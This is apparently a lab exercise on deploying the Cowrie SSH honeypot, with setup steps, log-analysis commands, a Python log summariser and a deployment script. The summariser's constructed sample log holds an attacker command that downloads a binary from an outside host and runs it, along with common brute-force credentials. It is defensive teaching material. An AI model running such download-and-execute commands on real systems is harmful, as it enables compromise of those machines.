Objective
Deploy a simple honeypot to detect and log malicious activities, analyze attacker behavior, and identify potential threat actors.
Scenario
As a security analyst, you’re tasked with monitoring unauthorized access attempts to your network. Deploying a honeypot can help detect brute-force attacks and malicious activities. In this exercise, you’ll set up a lightweight SSH honeypot using Cowrie, monitor logs for suspicious behavior, and analyze the captured data to identify attackers.
⚠️ Important: Perform this exercise in a controlled lab environment. Do not expose honeypots on production networks without proper security measures.
Lab Instructions
Step 1: Set Up the Environment
- Use a virtual machine (VM) or a dedicated server for the honeypot.
- Install a Linux distribution (e.g., Ubuntu Server).
Step 2: Install Cowrie Honeypot
Update the system:
sudo apt update && sudo apt upgrade -y
Install dependencies:
sudo apt install git python3 python3-venv python3-pip libssl-dev libffi-dev build-essential libpython3-dev -y
Create an unprivileged account to run the honeypot (Cowrie refuses to start as root) and switch to it:
sudo adduser --disabled-password cowrie
sudo su - cowrie
Clone the Cowrie repository:
git clone https://github.com/cowrie/cowrie.git
cd cowrie
Create and activate a Python virtual environment:
python3 -m venv cowrie-env
source cowrie-env/bin/activate
Install required Python packages:
pip install -r requirements.txt
Step 3: Configure Cowrie
Copy the default configuration:
cp etc/cowrie.cfg.dist etc/cowrie.cfg
Edit the configuration file so the honeypot looks like a real SSH server:
nano etc/cowrie.cfg
In the [ssh] section, change the default listener from port 2222 to 22 (the value is a Twisted endpoint string):
[ssh]
listen_endpoints = tcp:22:interface=0.0.0.0
If the host's real sshd also listens on 22, move it to another port first (the Port directive in /etc/ssh/sshd_config) or Cowrie will fail to bind.
Because Cowrie runs as the unprivileged cowrie user, let that user bind the privileged port with authbind (run these from an account with sudo):
sudo apt install authbind -y
sudo touch /etc/authbind/byport/22
sudo chmod 500 /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22
Then set AUTHBIND_ENABLED=yes in bin/cowrie so the start script wraps twistd in authbind.
Step 4: Start the Honeypot
Start Cowrie as the cowrie user, from the cowrie directory, with the virtual environment active:
bin/cowrie start
Verify that the honeypot is running:
bin/cowrie status
Step 5: Monitor Honeypot Logs
Cowrie writes a human-readable log and a JSON event log (one object per line) under var/log/cowrie/. Watch login attempts and commands as they arrive:
tail -f var/log/cowrie/cowrie.log
Note the source IPs and the usernames and passwords tried.
Commands typed by attackers appear in cowrie.log as CMD: lines and in cowrie.json as cowrie.command.input events. Full terminal sessions are recorded as binary ttylogs (in the directory set by ttylog_path in cowrie.cfg, var/lib/cowrie/tty by default), so cat is not useful on them; replay a session with:
bin/playlog var/lib/cowrie/tty/<session-ttylog>
Step 6: Analyze Collected Data
Identify source IP addresses of attackers. In cowrie.log the IP is the last element of the bracketed transport identifier, not the last field of the line (which is "failed" or "succeeded"), so the JSON log, where every event carries src_ip, is easier to query (install jq with sudo apt install jq):
jq -r 'select(.eventid | startswith("cowrie.login.")) | .src_ip' var/log/cowrie/cowrie.json | sort | uniq -c | sort -nr
Extract attempted username/password pairs:
jq -r 'select(.eventid | startswith("cowrie.login.")) | "\(.username) \(.password)"' var/log/cowrie/cowrie.json | sort | uniq -c | sort -nr
The same count of source IPs from the text log, where attempts are logged as login attempt [username/password] failed or succeeded:
grep 'login attempt \[' var/log/cowrie/cowrie.log | sed -E 's/.*HoneyPotTransport,[0-9]+,([0-9a-f.:]+)\].*/\1/' | sort | uniq -c | sort -nr
Step 7: Mitigation and Further Analysis
Use the data to block persistent sources at the perimeter firewall (not on the honeypot host itself, where a DROP rule only stops you collecting data from that source):
sudo iptables -A INPUT -s <malicious-ip> -j DROP
Report malicious IPs to threat intelligence feeds, and check whether any of the credential pairs seen here are valid on real systems in your environment.
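As an added worked example (not part of the original lab or of the Cowrie project), the following Python script performs the Step 6 analysis and produces the Step 7 blocklist from Cowrie's JSON event log. It reads the one-object-per-line records that Cowrie's jsonlog output writes to var/log/cowrie/cowrie.json and uses only the eventid, src_ip, session, username, password and input fields. The SAMPLE_LOG embedded in it is constructed for this example, not captured traffic, and the brute-force threshold of three attempts is an arbitrary choice.

```python
#!/usr/bin/env python3
"""Summarise a Cowrie JSON event log: who attacked, what they tried, what they ran.

Cowrie's jsonlog output writes one JSON object per line to
var/log/cowrie/cowrie.json. Only a few of its fields are needed here:
eventid, src_ip, session, username, password and input.
"""
import json
import sys
from collections import Counter, defaultdict

# Constructed sample log for this example (not real captured traffic):
# one source brute-forces root, gets in and pulls a binary; a second source
# only probes two credential pairs; the final line stands in for a record
# truncated by log rotation.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:30Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:32Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"password","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:33Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:34Z"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:35Z"}
{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:36Z"}
{"eventid":"cowrie.command.input","input":"cd /tmp; wget http://198.51.100.7/x86 -O x86; chmod +x x86; ./x86","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-01-19T12:45:37Z"}
{"eventid":"cowrie.session.closed","src_ip":"203.0.113.10","session":"a1","duration":8.2,"timestamp":"2024-01-19T12:45:38Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"b2","timestamp":"2024-01-19T12:50:00Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"198.51.100.23","session":"b2","timestamp":"2024-01-19T12:50:01Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","src_ip":"198.51.100.23","session":"b2","timestamp":"2024-01-19T12:50:02Z"}
{"eventid":"cowrie.login.failed","username":"root","pass
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(lines):
    """Parse JSON-lines input, skipping blank or corrupt records instead of aborting."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def login_attempts_by_ip(events):
    """Count login attempts (failed and successful) per source IP."""
    return Counter(e["src_ip"] for e in events if e.get("eventid") in LOGIN_EVENTS)


def top_credentials(events, n=5):
    """Most frequently tried (username, password) pairs."""
    pairs = Counter((e["username"], e["password"])
                    for e in events if e.get("eventid") in LOGIN_EVENTS)
    return pairs.most_common(n)


def successful_logins(events):
    """(src_ip, username, password) for every login that reached the emulated shell."""
    return [(e["src_ip"], e["username"], e["password"])
            for e in events if e.get("eventid") == "cowrie.login.success"]


def commands_by_session(events):
    """Commands typed in each session, in order, keyed by Cowrie session id."""
    cmds = defaultdict(list)
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            cmds[e["session"]].append(e["input"])
    return dict(cmds)


def brute_force_sources(events, threshold=3):
    """Source IPs with at least `threshold` login attempts (threshold is an arbitrary choice)."""
    return sorted(ip for ip, n in login_attempts_by_ip(events).items() if n >= threshold)


def iptables_rules(ips):
    """DROP rules for the perimeter firewall; on the honeypot host itself they would only stop collection."""
    return ["iptables -A INPUT -s %s -j DROP" % ip for ip in ips]


def main(path=None):
    if path:
        with open(path, encoding="utf-8") as f:
            lines = f.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    events = parse_events(lines)
    print("login attempts per source IP:")
    for ip, n in login_attempts_by_ip(events).most_common():
        print("  %5d  %s" % (n, ip))
    print("top credentials:")
    for (user, pw), n in top_credentials(events):
        print("  %5d  %s / %s" % (n, user, pw))
    print("successful logins:", successful_logins(events))
    for session, cmds in commands_by_session(events).items():
        print("session %s ran: %s" % (session, " ; ".join(cmds)))
    print("suggested perimeter rules:")
    for rule in iptables_rules(brute_force_sources(events)):
        print("  " + rule)


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it with no arguments to see the constructed sample summarised, or pass the path to a real cowrie.json. The parser deliberately skips unparseable lines rather than aborting, because a log rotated mid-write, or one being read while Cowrie is still appending, routinely contains a truncated last record.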
Solution & Explanation
How Honeypots Work
- Honeypots simulate vulnerable services to lure attackers.
- They record unauthorized access attempts and actions taken by attackers.
Why Honeypots Are Valuable
- Early Detection: Detect brute-force attacks and exploitation attempts.
- Behavior Analysis: Understand attacker tactics and tools.
- Threat Intelligence: Identify malicious IPs and common attack vectors.
Example Log Entry
2024-01-19 12:45:32+0000 [SSHService ssh-userauth on HoneyPotTransport,1,192.168.1.200] login attempt [root/123456] failed
Mitigation Strategies
- Deploy Honeypots Strategically: Place in DMZ or isolated networks.
- Monitor Regularly: Analyze logs for attack patterns.
- Block Malicious IPs: Use firewall rules or intrusion prevention systems.
- Share Threat Intelligence: Report attacker behavior to relevant databases.
Testing & Verification
- Attempt to SSH into the honeypot from another machine:
ssh root@<honeypot-ip>
- Verify that the attempt is logged in cowrie.log and appears in cowrie.json as a cowrie.login.failed or cowrie.login.success event. If the login is accepted you land in Cowrie's emulated shell; run a command such as uname -a and confirm it is recorded as a CMD: line.
Security Best Practices
- Isolate Honeypots: Prevent attackers from pivoting into production systems.
- Limit Data Exposure: Avoid deploying honeypots that store sensitive data.
- Use Threat Intelligence: Compare captured data with known attack indicators.
- Regular Updates: Keep honeypot tools updated to avoid detection.
Additional Script (Optional)
Automate Cowrie installation and setup:
#!/bin/bash
# Automate Cowrie Honeypot Deployment. Run as root (sudo ./deploy_cowrie.sh);
# the honeypot itself runs as the unprivileged "cowrie" user, since bin/cowrie refuses to start as root.
set -euo pipefail
apt update && apt install -y git python3 python3-venv python3-pip libssl-dev libffi-dev build-essential libpython3-dev authbind
id cowrie >/dev/null 2>&1 || adduser --disabled-password --gecos "" cowrie
# Let the cowrie user bind TCP/22 through authbind
touch /etc/authbind/byport/22
chown cowrie:cowrie /etc/authbind/byport/22
chmod 500 /etc/authbind/byport/22
# Fetch Cowrie once and hand the tree to the service account
[ -d /opt/cowrie ] || git clone https://github.com/cowrie/cowrie.git /opt/cowrie
chown -R cowrie:cowrie /opt/cowrie
# Everything from here runs as cowrie: virtualenv, dependencies, config, start
sudo -u cowrie bash -c '
  cd /opt/cowrie
  python3 -m venv cowrie-env
  source cowrie-env/bin/activate
  pip install -r requirements.txt
  cp -n etc/cowrie.cfg.dist etc/cowrie.cfg
  # listen on 22 instead of the default 2222 ([ssh] section) and enable the authbind wrapper in bin/cowrie
  sed -i "s/^listen_endpoints = tcp:2222:/listen_endpoints = tcp:22:/" etc/cowrie.cfg
  sed -i "s/^AUTHBIND_ENABLED=no/AUTHBIND_ENABLED=yes/" bin/cowrie
  bin/cowrie start
'
Run the script:
chmod +x deploy_cowrie.sh
sudo ./deploy_cowrie.sh
Conclusion
In this exercise, you deployed and configured Cowrie as an SSH honeypot, monitored logs for brute-force attacks, and analyzed malicious activity. Honeypots provide valuable insights into attacker behavior and are essential for proactive network security.